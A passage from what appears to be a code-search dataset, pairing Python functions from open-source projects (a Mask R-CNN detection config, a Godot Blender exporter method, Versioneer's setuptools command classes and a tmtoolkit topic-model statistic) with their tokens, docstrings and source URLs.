long = 1333 max_num_gt = 100 max_len_gt_poly = 2500 class AnchorTarget2DParam: def __init__(self): self.generate = self._generate() class _generate: def __init__(self): self.stride = (4, 8, 16, 32, 64) self.short = (200, 100, 50, 25, 13) self.long = (334, 167, 84, 42, 21) scales = (8) aspects = (0.5, 1.0, 2.0) class assign: allowed_border = 0 pos_thr = 0.7 neg_thr = 0.3 min_pos_thr = 0.0 class sample: image_anchor = 256 pos_fraction = 0.5 class RenameParam: mapping = dict(image="data") from core.detection_input import ReadRoiRecord, Resize2DImageBbox, \ ConvertImageFromHwcToChw, Flip2DImageBbox, Pad2DImageBbox, \ RenameRecord, Norm2DImage from models.maskrcnn.input import PreprocessGtPoly, EncodeGtPoly, \ Resize2DImageBboxMask, Flip2DImageBboxMask, Pad2DImageBboxMask from models.FPN.input import PyramidAnchorTarget2D if is_train: transform = [ ReadRoiRecord(None), Norm2DImage(NormParam), PreprocessGtPoly(), Resize2DImageBboxMask(ResizeParam), Flip2DImageBboxMask(), EncodeGtPoly(PadParam), Pad2DImageBboxMask(PadParam), ConvertImageFromHwcToChw(), RenameRecord(RenameParam.mapping) ] data_name = ["data"] label_name = ["im_info", "gt_bbox", "gt_poly"] if not RpnParam.nnvm_rpn_target: transform.append(PyramidAnchorTarget2D(AnchorTarget2DParam())) label_name += ["rpn_cls_label", "rpn_reg_target", "rpn_reg_weight"] else: transform = [ ReadRoiRecord(None), Norm2DImage(NormParam), Resize2DImageBbox(ResizeParam), ConvertImageFromHwcToChw(), RenameRecord(RenameParam.mapping) ] data_name = ["data", "im_info", "im_id", "rec_id"] label_name = [] import core.detection_metric as metric from models.maskrcnn.metric import SigmoidCELossMetric rpn_acc_metric = metric.AccWithIgnore( "RpnAcc", ["rpn_cls_loss_output", "rpn_cls_label_blockgrad_output"], [] ) rpn_l1_metric = metric.L1( "RpnL1", ["rpn_reg_loss_output", "rpn_cls_label_blockgrad_output"], [] ) # for bbox, the label is generated in network so it is an output box_acc_metric = metric.AccWithIgnore( "RcnnAcc", ["bbox_cls_loss_output", "bbox_label_blockgrad_output"], [] ) box_l1_metric = metric.L1( "RcnnL1", ["bbox_reg_loss_output", "bbox_label_blockgrad_output"], [] ) mask_cls_metric = SigmoidCELossMetric( "MaskCE", ["mask_loss_output"], [] ) metric_list = [rpn_acc_metric, rpn_l1_metric, box_acc_metric, box_l1_metric,] return General, KvstoreParam, RpnParam, RoiParam, BboxParam, DatasetParam, \ ModelParam, OptimizeParam, TestParam, \ transform, data_name, label_name, metric_list
[ "def", "get_config", "(", "is_train", ")", ":", "class", "General", ":", "log_frequency", "=", "10", "name", "=", "__name__", ".", "rsplit", "(", "\"/\"", ")", "[", "-", "1", "]", ".", "rsplit", "(", "\".\"", ")", "[", "-", "1", "]", "batch_image", "=", "2", "if", "is_train", "else", "1", "fp16", "=", "False", "loader_worker", "=", "8", "class", "KvstoreParam", ":", "kvstore", "=", "\"nccl\"", "batch_image", "=", "General", ".", "batch_image", "gpus", "=", "[", "0", ",", "1", ",", "2", ",", "3", ",", "4", ",", "5", ",", "6", ",", "7", "]", "fp16", "=", "General", ".", "fp16", "class", "NormalizeParam", ":", "normalizer", "=", "normalizer_factory", "(", "type", "=", "\"fixbn\"", ")", "class", "BackboneParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "depth", "=", "50", "class", "NeckParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "class", "RpnParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "batch_image", "=", "General", ".", "batch_image", "nnvm_proposal", "=", "True", "nnvm_rpn_target", "=", "False", "class", "anchor_generate", ":", "scale", "=", "(", "8", ",", ")", "ratio", "=", "(", "0.5", ",", "1.0", ",", "2.0", ")", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ",", "64", ")", "image_anchor", "=", "256", "max_side", "=", "1400", "class", "anchor_assign", ":", "allowed_border", "=", "0", "pos_thr", "=", "0.7", "neg_thr", "=", "0.3", "min_pos_thr", "=", "0.0", "image_anchor", "=", "256", "pos_fraction", "=", "0.5", "class", "head", ":", "conv_channel", "=", "256", "mean", "=", "(", "0", ",", "0", ",", "0", ",", "0", ")", "std", "=", "(", "1", ",", "1", ",", "1", ",", "1", ")", "class", "proposal", ":", "pre_nms_top_n", "=", "2000", "if", "is_train", "else", "1000", "post_nms_top_n", "=", "2000", "if", "is_train", "else", "1000", "nms_thr", "=", "0.7", "min_bbox_side", "=", "0", "class", "subsample_proposal", ":", "proposal_wo_gt", "=", "False", "image_roi", "=", "512", "fg_fraction", "=", "0.25", "fg_thr", "=", "0.5", "bg_thr_hi", "=", "0.5", "bg_thr_lo", "=", "0.0", "class", "bbox_target", ":", "num_reg_class", "=", "81", "class_agnostic", "=", "False", "weight", "=", "(", "1.0", ",", "1.0", ",", "1.0", ",", "1.0", ")", "mean", "=", "(", "0.0", ",", "0.0", ",", "0.0", ",", "0.0", ")", "std", "=", "(", "0.1", ",", "0.1", ",", "0.2", ",", "0.2", ")", "class", "BboxParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "num_class", "=", "1", "+", "80", "image_roi", "=", "512", "batch_image", "=", "General", ".", "batch_image", "class", "regress_target", ":", "class_agnostic", "=", "False", "mean", "=", "(", "0.0", ",", "0.0", ",", "0.0", ",", "0.0", ")", "std", "=", "(", "0.1", ",", "0.1", ",", "0.2", ",", "0.2", ")", "class", "MaskParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "resolution", "=", "28", "dim_reduced", "=", "256", "num_fg_roi", "=", "int", "(", "RpnParam", ".", "subsample_proposal", ".", "image_roi", "*", "RpnParam", ".", "subsample_proposal", ".", "fg_fraction", ")", "class", "RoiParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "out_size", "=", "7", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ")", "roi_canonical_scale", "=", "224", "roi_canonical_level", "=", "4", "class", "MaskRoiParam", ":", "fp16", "=", 
"General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "out_size", "=", "14", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ")", "roi_canonical_scale", "=", "224", "roi_canonical_level", "=", "4", "class", "DatasetParam", ":", "if", "is_train", ":", "image_set", "=", "(", "\"coco_train2014\"", ",", "\"coco_valminusminival2014\"", ")", "else", ":", "image_set", "=", "(", "\"coco_minival2014\"", ",", ")", "class", "OptimizeParam", ":", "class", "optimizer", ":", "type", "=", "\"sgd\"", "lr", "=", "0.01", "/", "8", "*", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", "momentum", "=", "0.9", "wd", "=", "0.0001", "clip_gradient", "=", "None", "class", "schedule", ":", "mult", "=", "2", "begin_epoch", "=", "0", "end_epoch", "=", "6", "*", "mult", "lr_iter", "=", "[", "60000", "*", "mult", "*", "16", "//", "(", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", ")", ",", "80000", "*", "mult", "*", "16", "//", "(", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", ")", "]", "class", "warmup", ":", "type", "=", "\"gradual\"", "lr", "=", "0.01", "/", "8", "*", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", "/", "3.0", "iter", "=", "500", "class", "TestParam", ":", "min_det_score", "=", "0.05", "max_det_per_image", "=", "100", "process_roidb", "=", "lambda", "x", ":", "x", "process_output", "=", "lambda", "x", ",", "y", ":", "process_output", "(", "x", ",", "y", ")", "class", "model", ":", "prefix", "=", "\"experiments/{}/checkpoint\"", ".", "format", "(", "General", ".", "name", ")", "epoch", "=", "OptimizeParam", ".", "schedule", ".", "end_epoch", "class", "nms", ":", "type", "=", "\"nms\"", "thr", "=", "0.5", "class", "coco", ":", "annotation", "=", "\"data/coco/annotations/instances_minival2014.json\"", "backbone", "=", "Backbone", "(", "BackboneParam", ")", "neck", "=", "Neck", "(", "NeckParam", ")", "rpn_head", "=", "RpnHead", "(", "RpnParam", ",", "MaskParam", ")", "roi_extractor", "=", "RoiExtractor", "(", "RoiParam", ")", "mask_roi_extractor", "=", "RoiExtractor", "(", "MaskRoiParam", ")", "bbox_head", "=", "BboxHead", "(", "BboxParam", ")", "mask_head", "=", "MaskHead", "(", "BboxParam", ",", "MaskParam", ",", "MaskRoiParam", ")", "bbox_post_processer", "=", "BboxPostProcessor", "(", "TestParam", ")", "detector", "=", "Detector", "(", ")", "if", "is_train", ":", "train_sym", "=", "detector", ".", "get_train_symbol", "(", "backbone", ",", "neck", ",", "rpn_head", ",", "roi_extractor", ",", "mask_roi_extractor", ",", "bbox_head", ",", "mask_head", ")", "test_sym", "=", "None", "else", ":", "train_sym", "=", "None", "test_sym", "=", "detector", ".", "get_test_symbol", "(", "backbone", ",", "neck", ",", "rpn_head", ",", "roi_extractor", ",", "mask_roi_extractor", ",", "bbox_head", ",", "mask_head", ",", "bbox_post_processer", ")", "class", "ModelParam", ":", "train_symbol", "=", "train_sym", "test_symbol", "=", "test_sym", "from_scratch", "=", "False", "random", "=", "True", "memonger", "=", "False", "memonger_until", "=", "\"stage3_unit21_plus\"", "class", "pretrain", ":", "prefix", "=", "\"pretrain_model/resnet%s_v1b\"", "%", "BackboneParam", ".", "depth", "epoch", "=", "0", "fixed_param", "=", "[", "\"conv0\"", ",", "\"stage1\"", ",", "\"gamma\"", ",", "\"beta\"", "]", "excluded_param", "=", "[", "\"mask_fcn\"", "]", "def", "process_weight", "(", "sym", ",", "arg", ",", "aux", ")", ":", "for", "stride", 
"in", "RpnParam", ".", "anchor_generate", ".", "stride", ":", "add_anchor_to_arg", "(", "sym", ",", "arg", ",", "aux", ",", "RpnParam", ".", "anchor_generate", ".", "max_side", ",", "stride", ",", "RpnParam", ".", "anchor_generate", ".", "scale", ",", "RpnParam", ".", "anchor_generate", ".", "ratio", ")", "# data processing", "class", "NormParam", ":", "mean", "=", "tuple", "(", "i", "*", "255", "for", "i", "in", "(", "0.485", ",", "0.456", ",", "0.406", ")", ")", "# RGB order", "std", "=", "tuple", "(", "i", "*", "255", "for", "i", "in", "(", "0.229", ",", "0.224", ",", "0.225", ")", ")", "# data processing", "class", "ResizeParam", ":", "short", "=", "800", "long", "=", "1333", "class", "PadParam", ":", "short", "=", "800", "long", "=", "1333", "max_num_gt", "=", "100", "max_len_gt_poly", "=", "2500", "class", "AnchorTarget2DParam", ":", "def", "__init__", "(", "self", ")", ":", "self", ".", "generate", "=", "self", ".", "_generate", "(", ")", "class", "_generate", ":", "def", "__init__", "(", "self", ")", ":", "self", ".", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ",", "64", ")", "self", ".", "short", "=", "(", "200", ",", "100", ",", "50", ",", "25", ",", "13", ")", "self", ".", "long", "=", "(", "334", ",", "167", ",", "84", ",", "42", ",", "21", ")", "scales", "=", "(", "8", ")", "aspects", "=", "(", "0.5", ",", "1.0", ",", "2.0", ")", "class", "assign", ":", "allowed_border", "=", "0", "pos_thr", "=", "0.7", "neg_thr", "=", "0.3", "min_pos_thr", "=", "0.0", "class", "sample", ":", "image_anchor", "=", "256", "pos_fraction", "=", "0.5", "class", "RenameParam", ":", "mapping", "=", "dict", "(", "image", "=", "\"data\"", ")", "from", "core", ".", "detection_input", "import", "ReadRoiRecord", ",", "Resize2DImageBbox", ",", "ConvertImageFromHwcToChw", ",", "Flip2DImageBbox", ",", "Pad2DImageBbox", ",", "RenameRecord", ",", "Norm2DImage", "from", "models", ".", "maskrcnn", ".", "input", "import", "PreprocessGtPoly", ",", "EncodeGtPoly", ",", "Resize2DImageBboxMask", ",", "Flip2DImageBboxMask", ",", "Pad2DImageBboxMask", "from", "models", ".", "FPN", ".", "input", "import", "PyramidAnchorTarget2D", "if", "is_train", ":", "transform", "=", "[", "ReadRoiRecord", "(", "None", ")", ",", "Norm2DImage", "(", "NormParam", ")", ",", "PreprocessGtPoly", "(", ")", ",", "Resize2DImageBboxMask", "(", "ResizeParam", ")", ",", "Flip2DImageBboxMask", "(", ")", ",", "EncodeGtPoly", "(", "PadParam", ")", ",", "Pad2DImageBboxMask", "(", "PadParam", ")", ",", "ConvertImageFromHwcToChw", "(", ")", ",", "RenameRecord", "(", "RenameParam", ".", "mapping", ")", "]", "data_name", "=", "[", "\"data\"", "]", "label_name", "=", "[", "\"im_info\"", ",", "\"gt_bbox\"", ",", "\"gt_poly\"", "]", "if", "not", "RpnParam", ".", "nnvm_rpn_target", ":", "transform", ".", "append", "(", "PyramidAnchorTarget2D", "(", "AnchorTarget2DParam", "(", ")", ")", ")", "label_name", "+=", "[", "\"rpn_cls_label\"", ",", "\"rpn_reg_target\"", ",", "\"rpn_reg_weight\"", "]", "else", ":", "transform", "=", "[", "ReadRoiRecord", "(", "None", ")", ",", "Norm2DImage", "(", "NormParam", ")", ",", "Resize2DImageBbox", "(", "ResizeParam", ")", ",", "ConvertImageFromHwcToChw", "(", ")", ",", "RenameRecord", "(", "RenameParam", ".", "mapping", ")", "]", "data_name", "=", "[", "\"data\"", ",", "\"im_info\"", ",", "\"im_id\"", ",", "\"rec_id\"", "]", "label_name", "=", "[", "]", "import", "core", ".", "detection_metric", "as", "metric", "from", "models", ".", "maskrcnn", ".", "metric", "import", "SigmoidCELossMetric", "rpn_acc_metric", 
"=", "metric", ".", "AccWithIgnore", "(", "\"RpnAcc\"", ",", "[", "\"rpn_cls_loss_output\"", ",", "\"rpn_cls_label_blockgrad_output\"", "]", ",", "[", "]", ")", "rpn_l1_metric", "=", "metric", ".", "L1", "(", "\"RpnL1\"", ",", "[", "\"rpn_reg_loss_output\"", ",", "\"rpn_cls_label_blockgrad_output\"", "]", ",", "[", "]", ")", "# for bbox, the label is generated in network so it is an output", "box_acc_metric", "=", "metric", ".", "AccWithIgnore", "(", "\"RcnnAcc\"", ",", "[", "\"bbox_cls_loss_output\"", ",", "\"bbox_label_blockgrad_output\"", "]", ",", "[", "]", ")", "box_l1_metric", "=", "metric", ".", "L1", "(", "\"RcnnL1\"", ",", "[", "\"bbox_reg_loss_output\"", ",", "\"bbox_label_blockgrad_output\"", "]", ",", "[", "]", ")", "mask_cls_metric", "=", "SigmoidCELossMetric", "(", "\"MaskCE\"", ",", "[", "\"mask_loss_output\"", "]", ",", "[", "]", ")", "metric_list", "=", "[", "rpn_acc_metric", ",", "rpn_l1_metric", ",", "box_acc_metric", ",", "box_l1_metric", ",", "]", "return", "General", ",", "KvstoreParam", ",", "RpnParam", ",", "RoiParam", ",", "BboxParam", ",", "DatasetParam", ",", "ModelParam", ",", "OptimizeParam", ",", "TestParam", ",", "transform", ",", "data_name", ",", "label_name", ",", "metric_list" ]
https://github.com/chengzhengxin/groupsoftmax-simpledet/blob/3f63a00998c57fee25241cf43a2e8600893ea462/config/resnet_v1b/mask_r50v1b_fpn_2x.py#L15-L336
godotengine/godot-blender-exporter
b8b883df64f601acc4c40110e99631422a4978ff
io_scene_godot/converters/simple_nodes.py
python
CameraNode.attribute_conversion
(self)
return self._cam_attr_conv
Get a list of quaternary tuple (blender_attr, godot_attr, lambda converter, attr type)
Get a list of quaternary tuple (blender_attr, godot_attr, lambda converter, attr type)
[ "Get", "a", "list", "of", "quaternary", "tuple", "(", "blender_attr", "godot_attr", "lambda", "converter", "attr", "type", ")" ]
def attribute_conversion(self): """Get a list of quaternary tuple (blender_attr, godot_attr, lambda converter, attr type)""" return self._cam_attr_conv
[ "def", "attribute_conversion", "(", "self", ")", ":", "return", "self", ".", "_cam_attr_conv" ]
https://github.com/godotengine/godot-blender-exporter/blob/b8b883df64f601acc4c40110e99631422a4978ff/io_scene_godot/converters/simple_nodes.py#L45-L48
martinfleis/momepy
ea90c32dd8f6f9ae7d71d2cd5a02e79572c3e8f7
versioneer.py
python
get_cmdclass
()
return cmds
Get the custom setuptools/distutils subclasses used by Versioneer.
Get the custom setuptools/distutils subclasses used by Versioneer.
[ "Get", "the", "custom", "setuptools", "/", "distutils", "subclasses", "used", "by", "Versioneer", "." ]
def get_cmdclass(): """Get the custom setuptools/distutils subclasses used by Versioneer.""" if "versioneer" in sys.modules: del sys.modules["versioneer"] # this fixes the "python setup.py develop" case (also 'install' and # 'easy_install .'), in which subdependencies of the main project are # built (using setup.py bdist_egg) in the same python process. Assume # a main project A and a dependency B, which use different versions # of Versioneer. A's setup.py imports A's Versioneer, leaving it in # sys.modules by the time B's setup.py is executed, causing B to run # with the wrong versioneer. Setuptools wraps the sub-dep builds in a # sandbox that restores sys.modules to it's pre-build state, so the # parent is protected against the child's "import versioneer". By # removing ourselves from sys.modules here, before the child build # happens, we protect the child from the parent's versioneer too. # Also see https://github.com/warner/python-versioneer/issues/52 cmds = {} # we add "version" to both distutils and setuptools from distutils.core import Command class cmd_version(Command): description = "report generated version string" user_options = [] boolean_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): vers = get_versions(verbose=True) print("Version: %s" % vers["version"]) print(" full-revisionid: %s" % vers.get("full-revisionid")) print(" dirty: %s" % vers.get("dirty")) print(" date: %s" % vers.get("date")) if vers["error"]: print(" error: %s" % vers["error"]) cmds["version"] = cmd_version # we override "build_py" in both distutils and setuptools # # most invocation pathways end up running build_py: # distutils/build -> build_py # distutils/install -> distutils/build ->.. # setuptools/bdist_wheel -> distutils/install ->.. # setuptools/bdist_egg -> distutils/install_lib -> build_py # setuptools/install -> bdist_egg ->.. # setuptools/develop -> ? # pip install: # copies source tree to a tempdir before running egg_info/etc # if .git isn't copied too, 'git describe' will fail # then does setup.py bdist_wheel, or sometimes setup.py install # setup.py egg_info -> ? # we override different "build_py" commands for both environments if "setuptools" in sys.modules: from setuptools.command.build_py import build_py as _build_py else: from distutils.command.build_py import build_py as _build_py class cmd_build_py(_build_py): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() _build_py.run(self) # now locate _version.py in the new build/ directory and replace # it with an updated value if cfg.versionfile_build: target_versionfile = os.path.join(self.build_lib, cfg.versionfile_build) print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) cmds["build_py"] = cmd_build_py if "cx_Freeze" in sys.modules: # cx_freeze enabled? from cx_Freeze.dist import build_exe as _build_exe # nczeczulin reports that py2exe won't like the pep440-style string # as FILEVERSION, but it can be used for PRODUCTVERSION, e.g. # setup(console=[{ # "version": versioneer.get_version().split("+", 1)[0], # FILEVERSION # "product_version": versioneer.get_version(), # ... 
class cmd_build_exe(_build_exe): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() target_versionfile = cfg.versionfile_source print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) _build_exe.run(self) os.unlink(target_versionfile) with open(cfg.versionfile_source, "w") as f: LONG = LONG_VERSION_PY[cfg.VCS] f.write( LONG % { "DOLLAR": "$", "STYLE": cfg.style, "TAG_PREFIX": cfg.tag_prefix, "PARENTDIR_PREFIX": cfg.parentdir_prefix, "VERSIONFILE_SOURCE": cfg.versionfile_source, } ) cmds["build_exe"] = cmd_build_exe del cmds["build_py"] if "py2exe" in sys.modules: # py2exe enabled? try: from py2exe.distutils_buildexe import py2exe as _py2exe # py3 except ImportError: from py2exe.build_exe import py2exe as _py2exe # py2 class cmd_py2exe(_py2exe): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() target_versionfile = cfg.versionfile_source print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) _py2exe.run(self) os.unlink(target_versionfile) with open(cfg.versionfile_source, "w") as f: LONG = LONG_VERSION_PY[cfg.VCS] f.write( LONG % { "DOLLAR": "$", "STYLE": cfg.style, "TAG_PREFIX": cfg.tag_prefix, "PARENTDIR_PREFIX": cfg.parentdir_prefix, "VERSIONFILE_SOURCE": cfg.versionfile_source, } ) cmds["py2exe"] = cmd_py2exe # we override different "sdist" commands for both environments if "setuptools" in sys.modules: from setuptools.command.sdist import sdist as _sdist else: from distutils.command.sdist import sdist as _sdist class cmd_sdist(_sdist): def run(self): versions = get_versions() self._versioneer_generated_versions = versions # unless we update this, the command will keep using the old # version self.distribution.metadata.version = versions["version"] return _sdist.run(self) def make_release_tree(self, base_dir, files): root = get_root() cfg = get_config_from_root(root) _sdist.make_release_tree(self, base_dir, files) # now locate _version.py in the new base_dir directory # (remembering that it may be a hardlink) and replace it with an # updated value target_versionfile = os.path.join(base_dir, cfg.versionfile_source) print("UPDATING %s" % target_versionfile) write_to_version_file( target_versionfile, self._versioneer_generated_versions ) cmds["sdist"] = cmd_sdist return cmds
[ "def", "get_cmdclass", "(", ")", ":", "if", "\"versioneer\"", "in", "sys", ".", "modules", ":", "del", "sys", ".", "modules", "[", "\"versioneer\"", "]", "# this fixes the \"python setup.py develop\" case (also 'install' and", "# 'easy_install .'), in which subdependencies of the main project are", "# built (using setup.py bdist_egg) in the same python process. Assume", "# a main project A and a dependency B, which use different versions", "# of Versioneer. A's setup.py imports A's Versioneer, leaving it in", "# sys.modules by the time B's setup.py is executed, causing B to run", "# with the wrong versioneer. Setuptools wraps the sub-dep builds in a", "# sandbox that restores sys.modules to it's pre-build state, so the", "# parent is protected against the child's \"import versioneer\". By", "# removing ourselves from sys.modules here, before the child build", "# happens, we protect the child from the parent's versioneer too.", "# Also see https://github.com/warner/python-versioneer/issues/52", "cmds", "=", "{", "}", "# we add \"version\" to both distutils and setuptools", "from", "distutils", ".", "core", "import", "Command", "class", "cmd_version", "(", "Command", ")", ":", "description", "=", "\"report generated version string\"", "user_options", "=", "[", "]", "boolean_options", "=", "[", "]", "def", "initialize_options", "(", "self", ")", ":", "pass", "def", "finalize_options", "(", "self", ")", ":", "pass", "def", "run", "(", "self", ")", ":", "vers", "=", "get_versions", "(", "verbose", "=", "True", ")", "print", "(", "\"Version: %s\"", "%", "vers", "[", "\"version\"", "]", ")", "print", "(", "\" full-revisionid: %s\"", "%", "vers", ".", "get", "(", "\"full-revisionid\"", ")", ")", "print", "(", "\" dirty: %s\"", "%", "vers", ".", "get", "(", "\"dirty\"", ")", ")", "print", "(", "\" date: %s\"", "%", "vers", ".", "get", "(", "\"date\"", ")", ")", "if", "vers", "[", "\"error\"", "]", ":", "print", "(", "\" error: %s\"", "%", "vers", "[", "\"error\"", "]", ")", "cmds", "[", "\"version\"", "]", "=", "cmd_version", "# we override \"build_py\" in both distutils and setuptools", "#", "# most invocation pathways end up running build_py:", "# distutils/build -> build_py", "# distutils/install -> distutils/build ->..", "# setuptools/bdist_wheel -> distutils/install ->..", "# setuptools/bdist_egg -> distutils/install_lib -> build_py", "# setuptools/install -> bdist_egg ->..", "# setuptools/develop -> ?", "# pip install:", "# copies source tree to a tempdir before running egg_info/etc", "# if .git isn't copied too, 'git describe' will fail", "# then does setup.py bdist_wheel, or sometimes setup.py install", "# setup.py egg_info -> ?", "# we override different \"build_py\" commands for both environments", "if", "\"setuptools\"", "in", "sys", ".", "modules", ":", "from", "setuptools", ".", "command", ".", "build_py", "import", "build_py", "as", "_build_py", "else", ":", "from", "distutils", ".", "command", ".", "build_py", "import", "build_py", "as", "_build_py", "class", "cmd_build_py", "(", "_build_py", ")", ":", "def", "run", "(", "self", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "versions", "=", "get_versions", "(", ")", "_build_py", ".", "run", "(", "self", ")", "# now locate _version.py in the new build/ directory and replace", "# it with an updated value", "if", "cfg", ".", "versionfile_build", ":", "target_versionfile", "=", "os", ".", "path", ".", "join", "(", "self", ".", "build_lib", ",", "cfg", ".", "versionfile_build", ")", 
"print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "versions", ")", "cmds", "[", "\"build_py\"", "]", "=", "cmd_build_py", "if", "\"cx_Freeze\"", "in", "sys", ".", "modules", ":", "# cx_freeze enabled?", "from", "cx_Freeze", ".", "dist", "import", "build_exe", "as", "_build_exe", "# nczeczulin reports that py2exe won't like the pep440-style string", "# as FILEVERSION, but it can be used for PRODUCTVERSION, e.g.", "# setup(console=[{", "# \"version\": versioneer.get_version().split(\"+\", 1)[0], # FILEVERSION", "# \"product_version\": versioneer.get_version(),", "# ...", "class", "cmd_build_exe", "(", "_build_exe", ")", ":", "def", "run", "(", "self", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "versions", "=", "get_versions", "(", ")", "target_versionfile", "=", "cfg", ".", "versionfile_source", "print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "versions", ")", "_build_exe", ".", "run", "(", "self", ")", "os", ".", "unlink", "(", "target_versionfile", ")", "with", "open", "(", "cfg", ".", "versionfile_source", ",", "\"w\"", ")", "as", "f", ":", "LONG", "=", "LONG_VERSION_PY", "[", "cfg", ".", "VCS", "]", "f", ".", "write", "(", "LONG", "%", "{", "\"DOLLAR\"", ":", "\"$\"", ",", "\"STYLE\"", ":", "cfg", ".", "style", ",", "\"TAG_PREFIX\"", ":", "cfg", ".", "tag_prefix", ",", "\"PARENTDIR_PREFIX\"", ":", "cfg", ".", "parentdir_prefix", ",", "\"VERSIONFILE_SOURCE\"", ":", "cfg", ".", "versionfile_source", ",", "}", ")", "cmds", "[", "\"build_exe\"", "]", "=", "cmd_build_exe", "del", "cmds", "[", "\"build_py\"", "]", "if", "\"py2exe\"", "in", "sys", ".", "modules", ":", "# py2exe enabled?", "try", ":", "from", "py2exe", ".", "distutils_buildexe", "import", "py2exe", "as", "_py2exe", "# py3", "except", "ImportError", ":", "from", "py2exe", ".", "build_exe", "import", "py2exe", "as", "_py2exe", "# py2", "class", "cmd_py2exe", "(", "_py2exe", ")", ":", "def", "run", "(", "self", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "versions", "=", "get_versions", "(", ")", "target_versionfile", "=", "cfg", ".", "versionfile_source", "print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "versions", ")", "_py2exe", ".", "run", "(", "self", ")", "os", ".", "unlink", "(", "target_versionfile", ")", "with", "open", "(", "cfg", ".", "versionfile_source", ",", "\"w\"", ")", "as", "f", ":", "LONG", "=", "LONG_VERSION_PY", "[", "cfg", ".", "VCS", "]", "f", ".", "write", "(", "LONG", "%", "{", "\"DOLLAR\"", ":", "\"$\"", ",", "\"STYLE\"", ":", "cfg", ".", "style", ",", "\"TAG_PREFIX\"", ":", "cfg", ".", "tag_prefix", ",", "\"PARENTDIR_PREFIX\"", ":", "cfg", ".", "parentdir_prefix", ",", "\"VERSIONFILE_SOURCE\"", ":", "cfg", ".", "versionfile_source", ",", "}", ")", "cmds", "[", "\"py2exe\"", "]", "=", "cmd_py2exe", "# we override different \"sdist\" commands for both environments", "if", "\"setuptools\"", "in", "sys", ".", "modules", ":", "from", "setuptools", ".", "command", ".", "sdist", "import", "sdist", "as", "_sdist", "else", ":", "from", "distutils", ".", "command", ".", "sdist", "import", "sdist", "as", "_sdist", "class", "cmd_sdist", "(", "_sdist", ")", ":", "def", "run", "(", "self", ")", ":", "versions", "=", "get_versions", "(", ")", "self", ".", "_versioneer_generated_versions", "=", 
"versions", "# unless we update this, the command will keep using the old", "# version", "self", ".", "distribution", ".", "metadata", ".", "version", "=", "versions", "[", "\"version\"", "]", "return", "_sdist", ".", "run", "(", "self", ")", "def", "make_release_tree", "(", "self", ",", "base_dir", ",", "files", ")", ":", "root", "=", "get_root", "(", ")", "cfg", "=", "get_config_from_root", "(", "root", ")", "_sdist", ".", "make_release_tree", "(", "self", ",", "base_dir", ",", "files", ")", "# now locate _version.py in the new base_dir directory", "# (remembering that it may be a hardlink) and replace it with an", "# updated value", "target_versionfile", "=", "os", ".", "path", ".", "join", "(", "base_dir", ",", "cfg", ".", "versionfile_source", ")", "print", "(", "\"UPDATING %s\"", "%", "target_versionfile", ")", "write_to_version_file", "(", "target_versionfile", ",", "self", ".", "_versioneer_generated_versions", ")", "cmds", "[", "\"sdist\"", "]", "=", "cmd_sdist", "return", "cmds" ]
https://github.com/martinfleis/momepy/blob/ea90c32dd8f6f9ae7d71d2cd5a02e79572c3e8f7/versioneer.py#L1527-L1706
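`get_cmdclass` above is meant to be wired into setup.py together with `get_version`; the standard Versioneer pattern looks like this (a sketch, with a placeholder package name):

import versioneer
from setuptools import setup

setup(
    name="example-package",              # placeholder
    version=versioneer.get_version(),
    cmdclass=versioneer.get_cmdclass(),  # injects the version/build_py/sdist commands built above
)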
WZBSocialScienceCenter/tmtoolkit
ed9b1d4af572cf10eae37b9566e229e2dd487605
tmtoolkit/topicmod/model_stats.py
python
marginal_word_distrib
(topic_word_distrib, p_t)
return (topic_word_distrib.T * p_t).sum(axis=1)
Return the marginal word distribution ``p(w)`` (term proportions derived from topic model) given the topic-word distribution (phi) `topic_word_distrib` and the marginal topic distribution ``p(T)`` `p_t`. The latter can be calculated with :func:`~tmtoolkit.topicmod.model_stats.marginal_topic_distrib`. :param topic_word_distrib: topic-word distribution; shape KxM, where K is number of topics, M is vocabulary size :param p_t: marginal topic distribution; array of size K :return: array of size M (vocabulary size) with marginal word distribution
Return the marginal word distribution ``p(w)`` (term proportions derived from topic model) given the topic-word distribution (phi) `topic_word_distrib` and the marginal topic distribution ``p(T)`` `p_t`. The latter can be calculated with :func:`~tmtoolkit.topicmod.model_stats.marginal_topic_distrib`.
